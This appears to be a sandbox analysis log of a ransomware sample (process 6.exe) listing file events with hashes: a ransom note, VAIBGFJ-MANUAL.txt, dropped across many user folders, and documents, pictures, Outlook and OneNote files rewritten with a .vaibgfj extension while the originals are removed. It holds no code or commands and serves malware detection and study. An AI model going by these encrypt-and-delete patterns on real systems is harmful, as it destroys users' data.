C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\9RI45C46\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\HPSK10OB\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\G4PHTCUR\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.vaibgfj
binary
MD5: 94928aff5fbea914e53707b5aa2e6afb
SHA256: 0fab6e13f8b070e33c3da0440e2332fb9493b8d0abff08026a0934744f5a2b4e
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.vaibgfj
binary
MD5: c361fadb1619855dabd54ad2cda5b4cd
SHA256: 9243c12e8de9ef67262773f8ce9861e8b9326e560f86a61513e492d373463a99
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.vaibgfj
binary
MD5: 7b3f80881138f4122cda51a3d8abd963
SHA256: e268764473b7428e7e79d7538b6033b0a7f56a4c3a5b5e875765fe1f383d0d4f
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.vaibgfj
binary
MD5: 79d9017358103f8ba0b8ade21a9c2fb0
SHA256: 10642fc6ea7243bb39b23fc2de9eaf03458d1f90504d3b3695d74602eea84696
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms.vaibgfj
binary
MD5: dfe15d13cddbbbf5073ef47227bf4d0d
SHA256: 194683894fc9ff959b9d0938352cce8e16b73b2059e4d27b728e446f22015dae
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms.vaibgfj
binary
MD5: 38b0a3f88e639882b6bd5e28ea5260eb
SHA256: 210c653e03504bead5d6f2ba62f51a47700be026e5dbf3047a8c39e3f0a76ce3
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Searches\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.vaibgfj
binary
MD5: 65e47e0d4c0ad351ea202c12d7ba35fb
SHA256: ecf1b72ca6b77a10fc05d0d42a4872eea764289681a8922238bb5ef7a3d4d382
3020
6.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.vaibgfj
binary
MD5: dcf45d6c012e6622f2afa196f1747f8d
SHA256: 04533d7a32d4809ad9adf559b6db9a5861e5fe726349216edf2e61b0e0e8bdad
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Saved Games\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Pictures\sportsreleased.jpg.vaibgfj
binary
MD5: 25f763c02d3121ba3e828bb4b386d65d
SHA256: 7c75eea800a6857416acddd40a89780fbda3b499f12b3a42efd6d11c1ef29e15
3020
6.exe
C:\Users\admin\Pictures\sportsreleased.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\amjapanese.jpg.vaibgfj
binary
MD5: 51521023e56968e3447dedd5bf445d4c
SHA256: 8c127856d95ff110323be0a7e772ea5137afafd3863433a947d043b6f116b1bb
3020
6.exe
C:\Users\admin\Pictures\somethingcanadian.jpg.vaibgfj
binary
MD5: 019f7207f18e03044cd791c1bfe41264
SHA256: 25da8b7da78982455b2e8ffcb20daa9e5333ac7af4f5b6a992e0428a1a126dde
3020
6.exe
C:\Users\admin\Pictures\relatedmagazine.png.vaibgfj
binary
MD5: b94c14b85a111ecdb48fa61fbaa9d0e9
SHA256: c90de99ac48950bb914d1bd4466f6ed489ee11e60262a60f3a8fc000435eef3f
3020
6.exe
C:\Users\admin\Pictures\ensurepress.jpg.vaibgfj
binary
MD5: 8339a8e252b98a8f39c43d316cb9419f
SHA256: 9a13195ee9ba73b0ce5a7a9f4180a92dcc0e66657a24ba9ec3edcff1dacddde2
3020
6.exe
C:\Users\admin\Pictures\amjapanese.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\relatedmagazine.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\ensurepress.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\somethingcanadian.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\adsconsider.png.vaibgfj
binary
MD5: d65024862e609047111e68588538d788
SHA256: 0a90accf2cd7048ddad8f730cc90ea35cb4f45cc2442df30a287c27d3f975850
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\ntuser.ini.vaibgfj
binary
MD5: 1e2ea02fb4b2d9381f47990aab670cef
SHA256: 0b2b610df8db561a6a0bac0f4f3896670376962296d3560b74b2978e627e3e13
3020
6.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Pictures\adsconsider.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.vaibgfj
binary
MD5: 0101e33d6a73b7a8f1d5baa9cd81436a
SHA256: 66af3ffad83338e58e2f6908d4acabceb93b3f36533bf8c8a0815bb17fa6df67
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.vaibgfj
binary
MD5: 8c7dd4352cc4dce31e084b0ea8a7d8eb
SHA256: ee551feaf7a9599a48acd848107a3710986d0f93f55de39843521b2c0a6c5d85
3020
6.exe
C:\Users\admin\Links\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.vaibgfj
binary
MD5: 3256d611b33cacfdda90009cf9e581d5
SHA256: 30b11b4a04832c9cb8396ab014466fdbd169101733c8843bd0190302241b2d16
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.vaibgfj
binary
MD5: a94fedb9ec10f9d7de56d660f40a350e
SHA256: efd6c9070a99340bddedcd6b2af9297c3d7ba5eeeecbcfae5bb7f10246e6b9d7
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.vaibgfj
binary
MD5: ca84406773e89c864693dc38b5ac17fa
SHA256: 2f85043067e327293f24e2e993576cfd15d636eaaeb5b35bdec99713b7d10455
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.vaibgfj
binary
MD5: eb9a9e49c81fa4901857e6ecdd6fcd6a
SHA256: 6489d5f9641bc7e0e6693ca8b7c06383c1521a4ce63cff60263b050088caa03f
3020
6.exe
C:\Users\admin\Favorites\Windows Live\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.vaibgfj
binary
MD5: 848aabbb15647ab8c10601c9d6703893
SHA256: c7c3e32d65e6ee0402ba32d3afbf4d7d3e43a29deb99ef272ccf566af8ed111c
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.vaibgfj
binary
MD5: 22e785a79e627c23c919666a664c090e
SHA256: 878f375f71468238291377b84c4d061083be684185f022420a247f8f3519d833
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.vaibgfj
pgc
MD5: 75f21331209ed09ba5a51ab8b9069465
SHA256: a6d21ebf3d5ac92b0fecc54e06185084207c47e47c4800d0ed904623ed828dab
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.vaibgfj
binary
MD5: b54664926bb5094c17b43d72fdd5d21f
SHA256: 10d9c6be619a6a21984fe468cf2e5d45e0573c7f6a42dc8e67ca7deaee18239d
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.vaibgfj
binary
MD5: 564e1688cf6e837fc482e35d48921f6d
SHA256: c2245ea5705916fca2393ebb0981f6d7eaa747b4f9cc45f5fc2412ccb28b7808
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.vaibgfj
binary
MD5: 97f70e1d501f33dd7f76975ce5439068
SHA256: e97de2b6aea038d81dc1e76ef7460b502cb3bdf00e4f0258f1d5a323a514dcab
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.vaibgfj
binary
MD5: b1a2d8c5972796507e6c74cd65a1dcaf
SHA256: ee99a3ff8dfd9dc63f6803a65b4fb6dd73e525b8d4eddc90c38168d612ebb991
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.vaibgfj
binary
MD5: ce600a3483c7a9a32a7b1269ff76156d
SHA256: 026c885c77dbd18b8b778ad50acd9917a56a97ea851de2b3ebe17ee56bbb6fad
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.vaibgfj
binary
MD5: d07c7b77781ddf6140b2e790e4884d98
SHA256: fb01c4b58d618bf34166a38239478c439cd1b4066a17d64172a2fccf74267351
3020
6.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.vaibgfj
binary
MD5: 1ad8cd1b4858fae1b143e91bf058a92a
SHA256: c45f9322adaaa5e9cdec28049f98fc5e9708a13034eb1948a3327e8ae3365dda
3020
6.exe
C:\Users\admin\Favorites\Links for United States\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.vaibgfj
binary
MD5: 282fc81aa1ff3bd644f03a93022e86cb
SHA256: edb123fb53bed311f5ed9466416dec2efae3c507e4209130ff9c3210a1c9e304
3020
6.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.vaibgfj
binary
MD5: 6c1ea1ca562c3cd1a4156745425804fb
SHA256: f90dc5b1fe020eef3edac5bf8cf1fb9d3db17a63d2157332db765bd3b69dea03
3020
6.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Favorites\Links\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Downloads\surveyhit.jpg.vaibgfj
binary
MD5: 9803b2ecf57abfbdd172c5baa8d99ff8
SHA256: 51d832e757b73b45f7c9fef1df9975508b69cff06faa3325c98e70f83debae25
3020
6.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.vaibgfj
binary
MD5: d03089f4231ef558ab652b8a4714e0d4
SHA256: 2fcd67a8fdc2c6b8a3340165a920e04c91e7d49b3f535c85e975cfdda4887b4c
3020
6.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Downloads\surveyhit.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Downloads\artistdeal.jpg.vaibgfj
binary
MD5: c8aadd80fe3db4cf2b93af71a8bca74f
SHA256: 6eaacc670924e9641c7f26c5760141469266464904d511493b29fc4319e7a6e7
3020
6.exe
C:\Users\admin\Downloads\officergallery.png.vaibgfj
binary
MD5: fa6901bc91aae1565812ad0c8bcaca04
SHA256: 956219d1fea01ffc015af918dd19b239581644271ee91bef004f6c9763c836c4
3020
6.exe
C:\Users\admin\Downloads\includeboys.jpg.vaibgfj
binary
MD5: ea7d03f3903860d720c6ce9b0a2f5181
SHA256: 6aa7310cb4fb6b5d545ac09f0eff606a755b00067353f46642ab1682ac61ad86
3020
6.exe
C:\Users\admin\Downloads\safetycalifornia.png.vaibgfj
binary
MD5: 2b583a5ca2f0b66be2b4069db840fce7
SHA256: 4e0f4b4f1920d5ab9ee6e5f1c4c7c66bf52522cba134b2050e92d2c7df6f4841
3020
6.exe
C:\Users\admin\Downloads\includeboys.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Downloads\officergallery.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Downloads\safetycalifornia.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Downloads\artistdeal.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\postwall.rtf.vaibgfj
binary
MD5: b494bc9533ad79fbd0ebc30cf05d55ab
SHA256: d5d9b3046d0846bac8c0fb42fa23e3fc85d68de2e8dad4e663df0c1629fc8334
3020
6.exe
C:\Users\admin\Downloads\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.vaibgfj
binary
MD5: 320e969da33a25d65b0e459bcea5c96c
SHA256: 31a3fdf248eb05838c26b1bfbfa7a8c0e7c1345bd6fff63da9723dff1a00875e
3020
6.exe
C:\Users\admin\Documents\zealandemail.rtf.vaibgfj
binary
MD5: ad785b2d067bd99fbbc1df8b8962f56c
SHA256: db02ce482d45de6e1c2551bb3dc3e71c06aca232c2c63b92c5d8e499d78dfc0f
3020
6.exe
C:\Users\admin\Documents\zealandemail.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\postwall.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.vaibgfj
binary
MD5: 33bd97cd93a5ce9d702a055edd145808
SHA256: d8890ac86339dd6775cd699ad62129d212c41a61c85696724683af7f8a48d8b8
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.vaibgfj
binary
MD5: 6a45de219a263dbe977369554d25bb34
SHA256: 06188e74bbb2f6e43c56749d27e83f701df5682fea1e40dcba872a162b381ada
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.vaibgfj
pgc
MD5: 5d02bfd704f197518d830547dfb55058
SHA256: df8b4b658918efa5412be36b2d5534806e04d528a8729ea0d5042caad304664d
3020
6.exe
C:\Users\admin\Documents\Outlook Files\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: e87a28cdac63399840b980a8eea7d68d
SHA256: 77bb04fd3e0fdc4c85d044adebfc45d717bef94b4f292ff05f26e1eb600b267a
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.vaibgfj
binary
MD5: 87700ebbd146c8aecc7835b418288bc1
SHA256: c16319131e22b9752e2e895e66049d014d015f607a92f21bcf66e1f83a9f7969
3020
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.vaibgfj
binary
MD5: 07d5c97aae7b1936600fbd02de6953ba
SHA256: faa465251f955ca8a87401e5722062fe1fa16a6ebce4f3b7e5f432d2198a088f
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.vaibgfj
binary
MD5: 4a0335ed1c533cd032aa84a6a0a584c1
SHA256: 21f9524b19c34683b74d8aa6b5ee872781c0697d2429a2736b26ca36e1325673
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Videos\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Documents\memotion.rtf.vaibgfj
binary
MD5: 2ce52bb2480253d4110b6a3332d1c8e6
SHA256: c4ef37074af36087988b2323d638ac19b61f346cf04ceb0bf5971b5ce3acf526
3020
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Music\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Pictures\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Documents\memotion.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\electronical.rtf.vaibgfj
binary
MD5: 4ba25a31d3820b7592e5951b248d2a07
SHA256: 0af22b30c5949e7c91c2d55a0e214dfcff61c5e51cda8a42bc2c0c9a67a16520
3020
6.exe
C:\Users\admin\Documents\increaseneeds.rtf.vaibgfj
binary
MD5: 0a955c09275aebe730b63707cab051bc
SHA256: b2fab13ee1b2ef51269cc8c7a2f3d0a6c90aeb34ff02bde2640fdf76243479f4
3020
6.exe
C:\Users\admin\Documents\growthvan.rtf.vaibgfj
binary
MD5: 7f3c85e5a588b6e2da08203bb754079f
SHA256: 57d53745ade2348673e4ebd493f8d3a92883343e7795f407248e2c1eb9edde4e
3020
6.exe
C:\Users\admin\Documents\increaseneeds.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\electronical.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Documents\growthvan.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\takeeffort.rtf.vaibgfj
binary
MD5: b50ba25647f8a72ab14ea4072af340a2
SHA256: 8dd1462ec751a31061fa01c24ecd57d4eb841ebc0dfc90d99a40574cf87631c6
3020
6.exe
C:\Users\admin\Documents\chapternetworks.rtf.vaibgfj
binary
MD5: f267a71dd8400e23428158bc32b01f6c
SHA256: 0cc7908752efb9182ac5326ef355650e8264306bf98bf96a74d30d89a397f477
3020
6.exe
C:\Users\admin\Documents\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Desktop\strongma.rtf.vaibgfj
binary
MD5: 396dcd413f24933791fe3c052500c2aa
